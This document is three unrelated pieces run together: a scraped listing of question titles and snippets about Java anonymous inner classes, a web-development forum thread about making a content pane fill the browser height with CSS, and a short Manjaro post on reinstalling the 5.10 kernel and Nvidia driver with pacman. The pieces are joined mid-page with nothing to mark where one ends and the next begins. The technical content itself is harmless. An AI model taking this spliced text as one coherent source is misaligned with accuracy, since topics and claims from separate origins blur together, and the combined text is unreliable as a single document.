Anonymous inner Comparable class in Java method? [duplicate] My professor offered this bit of code in an exercise about scope and lifetime: class AnonymousInnerClassInMethod { public static void main(String[] args) { int local = 1; ... 1 vote 3answers 113 views Confused about anonymous classes vs anonymous inner class I went searching to learn how to do lambda expressions in Java, but instead a confusion came up for me. So my understanding of an anonymous class is this: public class SomeObject { public static ... -2 votes 1answer 34 views Creating inner anonymous classes that extend other classes [closed] I know this works: class Main{ public static void main(String[]args){ AbstractClass object = new AbstractClass(){ ... }; } } It creates an object with implicitly extends the ... 4 votes 3answers 46 views Access an instance of a class from anonymous class argument I can't seem to find an answer to this through all the anonymous inner class questions on the site. public void start() { /* Ask the user to login */ final LoginFrame login; login = new ... 0 votes 3answers 32 views Need explanation on a method-call In the code below: public File[] findFiles (String path) { FilenameFilter textFilter = new FilenameFilter() { @override public boolean accept(File dir, String name) { ... 21 votes 1answer 1k views Lambda behaving differently than anonymous inner class While doing some basic lambda exercises, the output from an apparently identical anonymous inner class was giving me a different output than the lambda. interface Supplier<T> { T get(T t); ... 2 votes 2answers 63 views Runnable Inline Class declaration - able to access outer non-final variables In the code below, I am wondering why the run() in the inline class is able to access the outer class variable - semaphore (even though it is not declared final). private Semaphore semaphore = ... 1 vote 3answers 94 views If the usage of “new” keyword in Java implies memory allocation, why is it not the case for an anonymous inner class? As a beginner in Java, I've been taught that the usage of the "new" keyword leads to the invocation of a constructor and thereby memory allocation for the object. If that is indeed the case, what ... -1 votes 3answers 87 views Why use Anonymous Inner classes, and what are the alternatives? I've recently got into Android and have been looking at examples about Inner classes but don't really understand what the use of them is. They are used often when making listeners and when making a ... 0 votes 1answer 58 views Anonymous Inner Class in Java not working. Why? The class in question is this. As you can see, it's very simple. Just to learn about the workings of anonymous inner classes. In this case I am getting 4 errors saying that the symbols WaterLevel and ... 3 votes 3answers 88 views Build an anonymous inner class and call its methods I searched for this but unfortunately failed to find matches, I have this local anonymous inner class inside a method like this:- new Object(){ public void open(){ // do some stuff } ... 29 votes 7answers 2k views Difference between new Test() and new Test() { } What is the difference between these two ways of instantiating new objects of a class as follows: Test t1=new Test(); Test t2=new Test(){ }; When I tried the following code, I could see that both ... 2 votes 2answers 180 views Groovy - closures vs methods - the difference If you look very carefully at the picture included, you will notice that you can refactor Groovy code using the Eclipse IDE and convert a method to a closure and vice versa. So, what exactly is a ... 4 votes 2answers 87 views Instantiating anonymous inner classes in Java with additional interface implementation Let's say I have the following two class/interface definitions: public abstract class FooClass { public abstract void doFoo(); } and public interface BarInterface { public void doBar(); ... 2 votes 2answers 650 views How to inject an anonymous inner class with dagger? It's posible inject an anonymous class? I'm having the following error: java.lang.IllegalArgumentException: No inject registered for members/com.acme.MyFragment$1. You must explicitly add it to ... 4 votes 2answers 68 views Accessing outer inner class from nester inner class I have the following code: public class Bar {} public class FooBar {} public class Foo { public void method() { new Bar() { void otherMethod() { } void ... 0 votes 0answers 21 views AnTLR rewrite of code in C# I have the following code in Java: public class XLexer extends antlr.CharScanner implements TokenStream { public Token nextToken() { return null; } public TokenStream plumb() ... 0 votes 1answer 88 views anonymous-inner-classes vs static field I prefer to use static field for instances of classes that not store his state in fields instead anonymous-inner-classes. I think this good practice for to less memory and GC usage if method sort(or ... 2 votes 2answers 61 views How am I accessing my main class from an anonymous class? I thought I had a good grasp of what I was doing but whenever I feel like I have a good handle on something, I'm proven wrong :) The code in question is this @Override protected void ... 0 votes 2answers 197 views Dynamic Android Table I ran into another problem. Found a tutorial on how to create a dynamic table,followed it but mine doesnt seems to work,when adding the dynamic rows. The static column headings works fine. public ... 1 vote 1answer 210 views How would an anonymous class get GC'd in picasso on Android? Can someone explain to me the comment here: Don't create anonymous class of Target when calling Picasso as might get garbage collected. Keep a member field as a strong reference to prevent it ... 4 votes 1answer 149 views JDK Hashmap Source Code - Anonymous Inner Classes and Abstract Instantiation? Problem I'm trying to understand how Sun implemented the entrySet, keySet and values methods of the HashMap class but I'm coming across code that doesn't make sense to me. I understand conceptually ... 0 votes 2answers 442 views Instantiate Java anonymous inner class with generic using Class in variable Is it possible in Java 7 to instantiate an anonymous inner class with a generic type using a Class object that I have in hand? Here's the simplified version of the generic class I'm trying to ... 0 votes 1answer 55 views Why should we change the modifiers of fields outside an inner class to final? I have a question about why should we set a field final when we use it in an innerclass? for example why should we set the modifier of textField to final? My question is that why it will not be ... 0 votes 2answers 55 views In Java how can I access a variable from outside the anonymous class [duplicate] for example: for (int i = 0; i < 10; i++){ SomeClass something = new SomeClass(); something.setOnClickListener(new OnClickListener() { public void onClick(){ doSomething(i); ... 0 votes 2answers 298 views Java Eclipse android syntax errors with anonymous inner class I am trying to program a sort of 'menu' in android with 3 buttons, and OnClickListeners recording input from each. However, I am getting some strange syntax errors. Here is my MainActivity.java: ... 1 vote 1answer 78 views Why can't the aop execute when a method is called from anonymous class' method? Here is my custom annotation AnnoLogExecTime and class AOP: @Target(ElementType.METHOD) @Retention(RetentionPolicy.RUNTIME) @Documented public @interface AnnoLogExecTime { } @Aspect @Service public ... 3 votes 3answers 80 views How does the interface in anonymous inner class work? interface MyInter { public void display(); } class OuterClass8 { public static void main(String arg[]) { MyInter mi=new MyInter() { public void display() { ... 0 votes 3answers 48 views Why am I getting this error as I try from withing the anonymous class? I get an error that says : no suitable method found for showMessageDialog(<anonymous Runnable>,String,String,int) as I try to use the JOptionPane.show... method. Why is that ? private void ... 4 votes 4answers 113 views java, reflection , innerclass, Hi i want to get the object of inner class using reflection but i am getting some error in it. code is:- package reflaction; public class MyReflection { public static void main(String[] args) throws ... 2 votes 2answers 33 views How do I get this parameter? public class Test{ ClassB fieldB; public Test(ClassA instanceA){ fieldB = new ClassB(); fieldB.setOnClickListener(new OnClickListener() { @Override public void ... 1 vote 0answers 338 views How to return object from an anonymous inner class in java If I have the following function : public class Product { public String barCode; public String name; public Category category; public double price; public Store store; ... -2 votes 2answers 539 views Class Name for Java anonymous class [duplicate] Class A{ public void test(){ B b = new B(); System.out.println( "Class Name: " + b.createClassC().getClass() ); } } Class B{ public C createClassC(){ C c = new C(){ @Override ... 4 votes 3answers 280 views How to use inner class in practical [closed] Why would someone use an inner class? The same functionality can be achieved with a local class or subclass. An example would also be appreciated. 0 votes 1answer 225 views Android: override onDraw without subclassing when View has been instantiated from xml I have a class ConditionalEditText which is a compound custom view containing an EditText and a TextView. The layout of this view is defined in XML. I want to override the onDraw method of the ... 0 votes 0answers 13 views Eclipse requesting different parameters wheter I use a class as an anonymous inner class or not I uploaded this. The quick fix points to same crazy parameters that don't make any sense when I try to implement this class as an anonymous inner class. Take a look and see if you can crack what's ... 1 vote 2answers 70 views Java generics: Infering the type from another method? I have a decorator which I'd like to make generic in a special way. Usage: new ExceptionHandler() { public <T extends IrcEvent> void doIt( T msg, IrcBotProxy ... 4 votes 5answers 592 views Java ActionListeners I am going to be developing a game in Java, and it will have many listeners( action, key, mouse, etc..). My Question is what is the preferable way to implement the listeners. Method 1: ... -1 votes 1answer 577 views Use of Anonymous Inner Class in java public SampleBehaviour otherway(final String st) { return new SampleBehaviour() { private String str = st; @Override public void print() { ... 1 vote 2answers 73 views Interface as a method's parameter I have a problem with naming following situation {...} X.a; a.addListener( new ListenerForX(){ // some interface methods }); {...} It is the same as: {...} X.a; a.addListener( new XListener()); ... 1 vote 1answer 409 views javafx Anonymous Application class I'm used to Swing and am exploring javafx. In swing I'd create a class that extends Jpanel and then be able to test that class with a couple of lines of code in that class that created a JFrame. So ... 4 votes 2answers 109 views Pass outer anon class ref to a method in an inner anon class How to pass outer anon class ref to a method in an inner anon class in Java? I have a method that makes async call to a server - sendCall(some_args, callback). The callback is represented by ...
__label__pos
0.765542
dcsimg www.webdeveloper.com Results 1 to 4 of 4 Thread: A tricky height setting 1. #1 Join Date Jan 2009 Posts 24 A tricky height setting Hello. Here is the live site which I am trying to remove all of the frames from. http://www.gmmstudios.com/ Here is my Work in progress site. http://patrickrauland.com/gmm/ The tricky part is that I need the content area to be as tall as the browser will allow, and then to add a scroll bar. I want to be able to always see the navigation on the left. I also want the nav section to show as much of the background as possible, without showing so much that it adds a scroll bar. How can I do this in CSS? It seems to me that if I want a scroll bar for the content section that I have to set a specific height. Is there a way of setting 2. #2 Join Date Aug 2009 Location England Posts 29 I've noticed a bit of code in your stylesheet under #nav: height: 1168px; Try setting this to 100% first off and see what happens. You've also set the height of the #content_pane section to 500px, try setting this to *px (I forget if this is correct syntax or not though). I am a Freelance Developer. Please go to www.aaroncatlin.com for more information and contact details. NB: If I respond to you with a code snippet that doesn't quite work, I apologise. I type my responses very fast and can occasionally make a typo. 3. #3 Join Date Jan 2009 Posts 24 Thanks for the quick reply. That didn't quite solve the issue. setting the #nav height to 100&#37; will make that section as tall as your browser is. If the user scrolls down, there will be unfilled space. I tried setting the #content_pane to *px but that didn't do anything. I also tried 100% and that didn't do anything. Last edited by BFTrick; 08-14-2009 at 03:05 PM. 4. #4 Join Date Apr 2009 Posts 122 Hi Bftrick, Make a copy of your style sheet and replace the style.css styles with: Code: HTML { MIN-HEIGHT: 100%; height: 100%; } BODY { FONT-SIZE: 12px; MIN-HEIGHT: 100%; height: 100%; overflow-y: scroll; } H3 { FONT-SIZE: 18px; FONT-WEIGHT: normal } H2 { FONT-SIZE: 24px } #header { BACKGROUND: url(http://www.gmmstudios.com/Pictures/f...ckground.gif); HEIGHT: 83px } #nav { BACKGROUND-IMAGE: url(http://www.gmmstudios.com/Pictures/F...ckground.gif); POSITION: absolute; WIDTH: 160px; TOP: 83px; LEFT: 0px } #nav TABLE TR { HEIGHT: 40px } #content_pane { PADDING-BOTTOM: 0px; BACKGROUND-COLOR: #00abea; PADDING-LEFT: 160px; PADDING-RIGHT: 0px; PADDING-TOP: 0px } #content-bg { PADDING-BOTTOM: 10px; BACKGROUND-COLOR: white } #content { PADDING-BOTTOM: 0px; PADDING-LEFT: 50px; WIDTH: 500px; PADDING-RIGHT: 0px; BACKGROUND: url(http://www.gmmstudios.com/Pictures/Background.gif) no-repeat; PADDING-TOP: 50px } #content H1 { FONT-FAMILY: Impact, Haettenschweiler, Arial, "Arial Black" } #content H2 { FONT-FAMILY: Impact, Haettenschweiler, Arial, "Arial Black" } #content H3 { FONT-FAMILY: Impact, Haettenschweiler, Arial, "Arial Black" } #content H4 { FONT-FAMILY: Impact, Haettenschweiler, Arial, "Arial Black" } #content H5 { FONT-FAMILY: Impact, Haettenschweiler, Arial, "Arial Black" } #content H6 { FONT-FAMILY: Impact, Haettenschweiler, Arial, "Arial Black" } #content A IMG { FILTER: alpha(opacity='95'); opacity: 0.95 } #content A:hover IMG { FILTER: alpha(opacity='100'); opacity: 1 } #page { height: 100%; } What i've done is take off the height on the nav as its not needed, and told the HTML / Body to have 100% height. You might want to play about with this to get it just as you want, but this should hopefully help you on your way. Hope this helps - Andy Thread Information Users Browsing this Thread There are currently 1 users browsing this thread. (0 members and 1 guests) Tags for this Thread Posting Permissions • You may not post new threads • You may not post replies • You may not post attachments • You may not edit your posts •   HTML5 Development Center Recent Articles
__label__pos
0.626463
Manjaro 5.10 Kernel will not boot 5 months ago If - like me - you get stuck on boot after Manjaro updates to Linux Kernel 5.10, the solution is pretty simple: 1. Boot into 5.9 (you can choose the option in the grub boot menu 2. Reinstall the 5.10 kernel with: sudo pacman -S linux510 3. For good measure, reinstall the Nvidia driver (if you have an Nvidia card, that is) with: sudo pacman -S linux510-nvidia After that, the 5.10 kernel should boot.
__label__pos
0.875365